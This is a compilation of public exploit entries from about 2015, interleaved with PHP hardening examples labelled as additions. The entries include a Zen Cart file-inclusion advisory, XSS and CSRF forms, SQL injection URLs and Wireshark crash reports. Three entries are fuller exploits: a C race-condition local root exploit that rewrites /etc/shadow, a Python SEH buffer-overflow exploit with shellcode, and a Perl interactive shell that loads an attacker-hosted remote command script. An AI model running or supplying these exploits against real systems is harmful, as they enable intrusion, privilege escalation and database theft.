
Advisory ID: HTB23282
Product: Zen Cart
Vendor: Zen Ventures, LLC
Vulnerable Version(s): 1.5.4
Tested Version: 1.5.4
Advisory Publication:  November 25, 2015  [without technical details]
Vendor Notification: November 25, 2015 
Vendor Patch: November 26, 2015 
Public Disclosure: December 16, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8352
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical vulnerability in the popular e-commerce software Zen Cart, which can be exploited by remote, unauthenticated attackers to compromise the vulnerable system. A remote unauthenticated attacker may be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to the application's database and obtain information on all website users.

The vulnerability exists because directory traversal sequences in the "act" HTTP GET parameter of the "/ajax.php" script are not filtered before the value is used to include local PHP files via PHP's require() function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with the privileges of the web server.

The simple exploit below includes the file "/tmp/file.php" and executes its contents:

http://[host]/ajax.php?method=1&act=/../../../../tmp/file
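The fix on the defending side, shown here as an added example that is not Zen Cart's code and not part of the advisory: rather than filtering traversal sequences out of "act", treat the parameter purely as a lookup key into a fixed table of handler scripts, so the request value never becomes part of a filesystem path. The constant names, directory layout and handler names below are assumptions (PHP 7.1+).

```php
<?php
// Added example (not Zen Cart's code): allowlist-based include dispatch.
// HANDLER_DIR and the handler names are assumed for illustration.
declare(strict_types=1);

const HANDLER_DIR = __DIR__ . '/includes/ajax_handlers';

// Every includable handler is listed explicitly. The request value is only a
// key into this table; it is never concatenated into a path.
const HANDLERS = [
    'cart_add'    => 'cart_add.php',
    'cart_remove' => 'cart_remove.php',
    'shipping'    => 'shipping_quote.php',
];

/**
 * Resolve an "act" value to an absolute script path, or null when it is not
 * an allowed handler. There is no traversal filter to bypass: "/../x",
 * "cart_add\0" or "CART_ADD" all simply miss the lookup.
 */
function resolve_handler(string $act): ?string
{
    if (!array_key_exists($act, HANDLERS)) {
        return null;
    }
    return HANDLER_DIR . '/' . HANDLERS[$act];
}

function dispatch(array $get): void
{
    $act  = isset($get['act']) && is_string($get['act']) ? $get['act'] : '';
    $file = resolve_handler($act);
    if ($file === null) {
        http_response_code(400);
        header('Content-Type: application/json');
        echo json_encode(['error' => 'unknown action']);
        return;
    }
    require $file;
}

if (PHP_SAPI === 'cli') {
    // Quick check of the lookup against the advisory's input and a valid key.
    var_dump(resolve_handler('/../../../../tmp/file'));   // NULL
    var_dump(resolve_handler('cart_add'));                // ".../includes/ajax_handlers/cart_add.php"
} else {
    dispatch($_GET);
}
```

A deny-list filter (stripping "../" from the value) is a weaker substitute, because a single removal pass can leave a traversal sequence behind; the allowlist fails closed on anything it does not recognise, including the advisory's "/../../../../tmp/file" value.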


-----------------------------------------------------------------------------------------------

Solution:

Apply vendor's patch.

More Information:
https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion
[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
source: https://www.securityfocus.com/bid/64779/info

Atmail Webmail Server is prone to an HTML-injection vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Atmail 7.1.3 is vulnerable; other versions may also be affected.

 <iframe width=0 height=0 src="javascript:alert('xss in main body')"> 
            
source: https://www.securityfocus.com/bid/64740/info

EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.

An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

Local File Disclosure:
=====================
www.example.com/utils.php?action=download&filename=file.php%00
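A hardened version of such a download endpoint, added here as an example (not EZGenerator's code): it rejects NUL bytes explicitly, reduces the name to a single path component, canonicalises the result and checks that it is still under the intended directory, and refuses to serve server-side source. The directory, the require_login() helper and its session flag are assumptions.

```php
<?php
// Added example (not EZGenerator's code): hardened file-download handler.
// DOWNLOAD_ROOT, require_login() and the session flag are assumptions.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/app/downloads';   // assumed; not the web root itself

/** Minimal authorization gate; the original endpoint had none (assumed session flag). */
function require_login(): void
{
    if (empty($_SESSION['user_id'])) {
        http_response_code(403);
        exit('login required');
    }
}

/**
 * Map a user-supplied filename to an absolute path inside DOWNLOAD_ROOT,
 * or return null for anything that does not belong there.
 */
function safe_download_path(string $name): ?string
{
    // 1. Reject NUL bytes outright. "%00" in the PoC URL decodes to "\0"; older PHP
    //    handed that to the C library, which truncated the path at the NUL.
    //    Current PHP refuses such paths, but an explicit check keeps the intent visible.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // 2. Keep only the last path component and demand a conservative character set.
    $base = basename($name);
    if ($base === '' || !preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\z/', $base)) {
        return null;
    }
    // 3. Canonicalise and verify the result is still under the root
    //    (a symlink in the directory pointing elsewhere fails here).
    $root = realpath(DOWNLOAD_ROOT);
    $path = realpath(DOWNLOAD_ROOT . '/' . $base);
    if ($root === false || $path === false || !is_file($path)
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // 4. Never serve server-side source, even from the download directory.
    if (preg_match('/\.(php\d?|phtml|phar|inc)\z/i', $path)) {
        return null;
    }
    return $path;
}

function send_file(string $path): void
{
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

if (PHP_SAPI === 'cli') {
    var_dump(safe_download_path("file.php\0"));        // NULL (NUL byte)
    var_dump(safe_download_path('../../etc/passwd'));   // NULL (nothing of that name under the root)
} else {
    session_start();
    require_login();
    $raw  = $_GET['filename'] ?? '';
    $path = safe_download_path(is_string($raw) ? $raw : '');
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    send_file($path);
}
```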

CSRF [Add Admin]:
================

<form method="POST" name="form0" action="http://www.example.com/centraladmin.php?process=processuser">
<input type="hidden" name="flag" value="add"/>
<input type="hidden" name="old_username" value=""/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="name" value="mm"/>
<input type="hidden" name="sirname" value="hh"/>
<input type="hidden" name="email" value="email@live.com"/>
<input type="hidden" name="password" value="12121212"/>
<input type="hidden" name="repeatedpassword" value="12121212"/>
<input type="hidden" name="select_all" value="yes"/>
<input type="hidden" name="access_to_page47" value="2"/>
<input type="hidden" name="save" value="Save"/>
</form>
</body>
</html>
            
source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. 

<form method="POST" name="form0" action="http://www.example.com/adminpanel/edit_admin.php">
<input type="hidden" name="userid" value="ADMIN"/>
<input type="hidden" name="pass" value="12121212"/>
<input type="hidden" name="retypepass" value="12121212"/>
<input type="hidden" name="addnew" value="1"/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="new" value="Submit"/>
</form>
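The defence against this form, against the EZGenerator add-admin form above, and against the Dredge School change-password form later on this page is the same: every state-changing request must carry a per-session secret that a cross-origin page cannot read. The synchronizer-token implementation below is an added example, not code from any of those products; the field name, session layout and form fields are assumptions (PHP 7+ for random_bytes()).

```php
<?php
// Added example (not Built2Go's, EZGenerator's or Dredge's code): synchronizer
// token for state-changing admin forms. Field and session names are assumed.
declare(strict_types=1);
session_start();

const CSRF_FIELD = 'csrf_token';

/** Per-session token, generated on first use with a CSPRNG (PHP 7+). */
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_FIELD])) {
        $_SESSION[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_FIELD];
}

/** True only if the submitted token matches the session token (constant-time compare). */
function csrf_valid(array $post): bool
{
    if (empty($_SESSION[CSRF_FIELD])) {
        return false;
    }
    if (!isset($post[CSRF_FIELD]) || !is_string($post[CSRF_FIELD])) {
        return false;
    }
    return hash_equals($_SESSION[CSRF_FIELD], $post[CSRF_FIELD]);
}

/** Hidden input to embed in every form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Handler side. A forged form like the PoC above carries the expected field
// names but cannot carry a token it has never seen, so it stops here.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('missing or invalid CSRF token');
    }
    $pass = $_POST['pass'] ?? '';
    if ($pass === '' || $pass !== ($_POST['retypepass'] ?? '')) {
        exit('passwords do not match');
    }
    // ... only now update the account. For a password change also require the
    // current password, which a cross-site request cannot supply either.
}
?>
<form method="POST" action="edit_admin.php">
  <?= csrf_field() ?>
  <input type="password" name="pass">
  <input type="password" name="retypepass">
  <input type="submit" value="Save">
</form>
```

As a second layer, issue the session cookie with SameSite=Lax (session_set_cookie_params() accepts a samesite option from PHP 7.3), so a cross-site POST does not carry the session at all; the token check remains the primary control because older browsers ignore the attribute.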
            
/* == virtfshell ==
 *
 * Some distributions make virtfs-proxy-helper from QEMU either SUID or
 * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
 * virtfs-proxy-helper makes some sort of flimsy check to make sure
 * its socket path doesn't already exist, it is vulnerable to TOCTOU.
 *
 * This should spawn a root shell eventually on vulnerable systems.
 *
 * - zx2c4
 * 2015-12-12
 *
 *
 * zx2c4@thinkpad ~ $ lsb_release -i
 * Distributor ID: Gentoo
 * zx2c4@thinkpad ~ $ ./virtfshell 
 * == Virtfshell - by zx2c4 ==
 * [+] Trying to win race, attempt 749
 * [+] Chown'd /etc/shadow, elevating to root
 * [+] Cleaning up
 * [+] Spawning root shell
 * thinkpad zx2c4 # whoami
 * root
 *
 */

#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>


static int it_worked(void)
{
	struct stat sbuf = { 0 };
	stat("/etc/shadow", &sbuf);
	return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}

int main(int argc, char **argv)
{
	int fd;
	pid_t pid;
	char uid[12], gid[12];
	size_t attempts = 0;

	sprintf(uid, "%d", getuid());
	sprintf(gid, "%d", getgid());

	printf("== Virtfshell - by zx2c4 ==\n");

	printf("[+] Beginning race loop\n");

	while (!it_worked()) {
		printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
		fd = inotify_init();
		unlink("/tmp/virtfshell/sock");
		mkdir("/tmp/virtfshell", 0777);
		inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
		pid = fork();
		if (pid == -1)
			continue;
		if (!pid) {
			close(0);
			close(1);
			close(2);
			execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
			_exit(1);
		}
		read(fd, 0, 0);
		unlink("/tmp/virtfshell/sock");
		symlink("/etc/shadow", "/tmp/virtfshell/sock");
		close(fd);
		kill(pid, SIGKILL);
		wait(NULL);
	}

	printf("[+] Chown'd /etc/shadow, elevating to root\n");

	system(	"cp /etc/shadow /tmp/original_shadow;"
		"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
		"cat /tmp/modified_shadow > /etc/shadow;"
		"su -c '"
		"	echo [+] Cleaning up;"
		"	cat /tmp/original_shadow > /etc/shadow;"
		"	chown root:root /etc/shadow;"
		"	rm /tmp/modified_shadow /tmp/original_shadow;"
		"	echo [+] Spawning root shell;"
		"	exec /bin/bash -i"
		"'");
	return 0;
}
            
source: https://www.securityfocus.com/bid/64734/info
 
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
 
http://www.example.com/news.php?id=1
            
source: https://www.securityfocus.com/bid/64734/info

UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. 

http://www.example.com/products.php?cat_id=4 
            
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port

import socket
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

a = socket.socket()

print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))

entire=4500

# Junk
buff = "A"*4061

# Next SEH
buff+= "\xeb\x0A\x90\x90"

# pop pop ret
buff+= "\x98\x97\x01\x10"

buff+= "\x90"*19

# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode

buff+= "\x90"*7

buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)

# HEAD
a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")

a.close()

print "Done..."
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=663

The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):

--- cut ---
==17016==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd11f12408 at pc 0x7ff4a833d06d bp 0x7ffd11f11590 sp 0x7ffd11f11588
WRITE of size 8 at 0x7ffd11f12408 thread T0
    #0 0x7ff4a833d06c in dissect_tds7_colmetadata_token wireshark/epan/dissectors/packet-tds.c:2935:29
    #1 0x7ff4a8328d41 in dissect_tds_resp wireshark/epan/dissectors/packet-tds.c:3729:32
    #2 0x7ff4a8326608 in dissect_netlib_buffer wireshark/epan/dissectors/packet-tds.c:3911:17
    #3 0x7ff4a8324de2 in dissect_tds_message wireshark/epan/dissectors/packet-tds.c:4090:13
    #4 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #5 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
    #6 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #7 0x7ff4a82e1f80 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
    #8 0x7ff4a82e77f3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
    #9 0x7ff4a82e2b4c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
    #10 0x7ff4a82f7f53 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
    #11 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #12 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
    #13 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #14 0x7ff4a743a59b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
    #15 0x7ff4a7444fc9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
    #16 0x7ff4a743ace9 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2508:5
    #17 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #18 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
    #19 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #20 0x7ff4a631fb54 in dissector_try_uint wireshark/epan/packet.c:1174:9
    #21 0x7ff4a7c1d470 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:3977:10
    #22 0x7ff4a7c1cc2c in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:4954:5
    #23 0x7ff4a7c150a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:4995:5
    #24 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #25 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
    #26 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #27 0x7ff4a703c3a6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
    #28 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #29 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
    #30 0x7ff4a63294ae in call_dissector_only wireshark/epan/packet.c:2662:8
    #31 0x7ff4a631aebf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #32 0x7ff4a631a52b in dissect_record wireshark/epan/packet.c:501:3
    #33 0x7ff4a62c85b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
    #34 0x5264eb in process_packet wireshark/tshark.c:3728:5
    #35 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
    #36 0x515daf in main wireshark/tshark.c:2197:13

Address 0x7ffd11f12408 is located in stack of thread T0 at offset 2088 in frame
    #0 0x7ff4a83285df in dissect_tds_resp wireshark/epan/dissectors/packet-tds.c:3658

  This frame has 1 object(s):
    [32, 2088) 'nl_data' <== Memory access at offset 2088 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-tds.c:2935:29 in dissect_tds7_colmetadata_token
Shadow bytes around the buggy address:
  0x1000223da430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000223da480: 00[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
  0x1000223da490: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000223da4d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==17016==ABORTING
--- cut ---

The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11846. Attached is a file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38993.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=650

The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):

--- cut ---
==9819==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000027b3c at pc 0x00000087416b bp 0x7fff95547770 sp 0x7fff95547768
WRITE of size 1 at 0x603000027b3c thread T0
    #0 0x87416a in iseries_parse_packet wireshark/wiretap/iseries.c:820:27
    #1 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
    #2 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
    #3 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
    #4 0x52c1df in main wireshark/tshark.c:2197:13

0x603000027b3c is located 3 bytes to the right of 25-byte region [0x603000027b20,0x603000027b39)
allocated by thread T0 here:
    #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7ff6f1a34610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
    #3 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
    #4 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
    #5 0x52c1df in main wireshark/tshark.c:2197:13

SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/iseries.c:820:27 in iseries_parse_packet
Shadow bytes around the buggy address:
  0x0c067fffcf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffcf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffcf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffcf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffcf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fffcf60: fa fa fa fa 00 00 00[01]fa fa 00 00 00 00 fa fa
  0x0c067fffcf70: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fffcf80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fffcf90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fffcfa0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fffcfb0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==9819==ABORTING
--- cut ---

The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38992.zip
            
# Title: Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fnewsletter&file=newsletter-2-2.zip&idf=882

# Proof-of-Concept:

# /newsletter-2-2/programs/admin.php line 3
# ----------------------------------------------------------

# require_once($GLOBALS['babInstallPath'].'admin/acl.php');

# ----------------------------------------------------------

# Problem: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
# Fix: Declare this parameter or use an alert in php-sourcecode.
#     For example "BummPrengeleng, you nose-person!" :D

# ----------------
# ~~Exploitcode~~
# ----------------

use LWP::UserAgent;
 
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
 
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
 
head();
 
while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);
 
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'programs/admin.php?GLOBALS[babInstallPath]'.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
 
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;
 
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
 
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
 
if($return =~ /(.*)/)
 
 
{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}
 
else {print "[shell] \$";}}}last;
 
sub head()
 {
 print "\n============================================================================\r\n";
 print " *Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit*\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: sploit.pl [someone] [cmd shell location] [cmd shell variable]\r\n\n";
 print " <Site> - Full path to phgstats ex: http://www.someone.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.someone/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                           Bug Found by bd0rk \r\n";
 print "============================================================================\r\n";
 exit();
 }
         
            
########################################################################################
#______________________________________________________________________________________
# Exploit Title  : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork    : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link  : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date           : 15-December-2015
# Version        : (Version 1.00)
# CVE            : NONE
# Tested On      : Linux - Chrome
# Category       : Web Application
# MY HOME        : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________

## Vulnerability Code

<?php
include('config.php');

//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];

$article = $_GET['id'];

if (!is_numeric($article)) {
header('Location: '.$siteurl);
}

else

{

$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());

//Create site settings variables
$siteinfo = mysql_fetch_array($siteresult);
$sitetitle = $siteinfo['title'];
$siteurl = $siteinfo['url'];
$sitecomments = $siteinfo['comments'];
$commentmod = $siteinfo['commentmod'];

$query = "select * from articles where status=0 and id = ".$article;

$articleresults = mysql_query($query,$connection) or die(mysql_error());
$num_results = mysql_num_rows($articleresults);
$articleinfo = mysql_fetch_array($articleresults);

if (!$num_results) {
header('Location: '.$siteurl);
}

//Get article info
$id = $articleinfo['id'];
$authorid = $articleinfo['authorid'];
$date = strtotime($articleinfo['date']);
$artdate = date('m/d/y', $date);
$categoryid = $articleinfo['categoryid'];
$title = stripslashes($articleinfo['title']);
$body = stripslashes($articleinfo['body']);
$resource = $articleinfo['resource'];

//Meta Info
$cathead = 0;
$metatitle = $title." - ";
include('header.php');
include('sidebar.php');

if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }

// Setup the article template
$articletemp = new Template("templates/".$template."/article.tpl");

// get author info
$authorquery = "select * from authors where id=".$authorid;
$authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
$authorinfo = mysql_fetch_array($authorresult);
$authorname = $authorinfo['displayname'];
$authorbio = $authorinfo['bio'];
$gravatar = $authorinfo['gravatar'];
if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }

// get category info
$catquery = "select * from categories where id=".$categoryid;
$catresult = mysql_query($catquery,$connection) or die(mysql_error());
